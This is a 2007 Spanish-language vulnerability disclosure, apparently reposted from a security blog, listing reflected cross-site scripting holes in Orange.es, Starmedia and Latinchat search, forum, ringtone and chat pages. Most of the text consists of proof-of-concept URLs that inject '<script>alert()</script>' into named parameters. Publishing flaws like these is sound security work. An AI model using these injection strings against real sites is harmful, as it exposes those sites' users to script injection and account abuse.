#################################################
Orange.es Starmedia y latinchat vulnerables a
ataques de tipo Cross-site Scripting.
Articulo original:http://lostmon.blogspot.com/
2007/08/orangees-starmedia-y-latinchat.html
#################################################
Hace varios dias que intente ponerme en contacto
con el webmaster tanto de starmedia ,orange para
notificarles una serie de vulnerabilidades en sus
paginas.Hasta tres correos en diferentes fechas sin
Obtener ninguna respuesta por parte del grupo.
Estas paginas , estan afectadas por una vulnerabilidad
llamada Cross site scripting,Atraves de la cual se puede
ejecutar codigo html o javascript en el contexto de seguridad
entre el servidor y el usuario cliente.
Asi pues si visitais estas paginas y usais sus servicios
ir con cuidado y comprobar las URL que visitais de las mismas
y que no haya nada extraño en ellas.
###################################
Sobre el dominio:*.orange.es
###################################
http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado"><script>
alert()</script>&xargs=&estat=
http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen"><script>alert()</script>
&filtrofamiliar=Desactivado&xargs="&estat=
http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=">
<script>alert()</script>&estat=
http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=
"><script>alert()</script>
http://busca.orange.es/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=
http://busca.orange.es/search?buscar=todo+spice+girls
&first=&rbpref=pref&destino=web&filtrofamiliar=Activado
"><script>alert()</script>&xargs=&estat=
Todas las variables de la siguiente url estan afectadas
menos la y , la x , la rbpref y slanguage.
http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&
iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&
inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers
=&slanguage=&rbpref=advanced&lang=&x=44&y=13
http://cine.orange.es/buscador/contenidos.html?&text=
%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://cine.orange.es/encuestas/encuestas.html?id=3801
"><script>alert()</script>
http://foros.orange.es/forosw/servlet/buscarForos?query=
"><script>alert()</script>
http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385&re="><script>alert()</script>
http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385"><script>alert()</script>&re=blah
http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415
"><script>alert()</script> // sin estar logeado.
http://tonosdeespera.orange.es/RingBackTones/servlet/web/
TonosCategoria?identificador=5117154&TitCat=Pop+Rock+
Internacional"><script>alert()</script>
http://personales.orange.es/orange/site/siteBuscador?
palabras="><script>alert()</script>
&idcategoria=#busquedas
###################################
En sus Chats.
###################################
se puede llamar a una ventana de privado sin estar en el chat:
y ademas el parametro username de usuario al que abrimos el
privado es tambien vulnerable:
http://disp011-org.orange.es/magma_qa/templates/T12/
0/privat.html?
UserName=Lostmon"><script>alert()</script>
http://dhtml.orange.es/magma_qa/templates/T12/R0/
showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&
InstanceID=R32_7-1&UserName=Lostmon
ademas las cajas para introducir texto para enviar al canal o
la caja de mensage a enviar en el privado tambien permite el
envio de codigo XSS esperimentando,con los chats , tal vez
sea asi mismo posible enviar codigo XSS a los demas usuarios
( no lo he probado)
############################
Starmedia
##########################
como puede verse en la siguiente url , el caso es el mismo
que en el dominio orange.es.
La estructura web sigue el mismo patron
con lo cual podemos pensar que es el mismo tipo de sistema
y posee las mismas vulnerabilidades ( y asi es ).
http://busca.starmedia.com/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=
tabien esta afectado de la misma manera y al ser el mismo tipo de
sistema en el chat (latinchat)
tambien posee las mismas vulnerabilidades.
http://login04.latinchat.com/magma_qa/templates/modules/
result/T2.php?UserName=Lostmon"><script>
alert()</script>&InstanceID=R31_1-1
##################### €nd ##############################
Thnxs To estrella to be my ligth
Thnx to all Lostmon team !
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....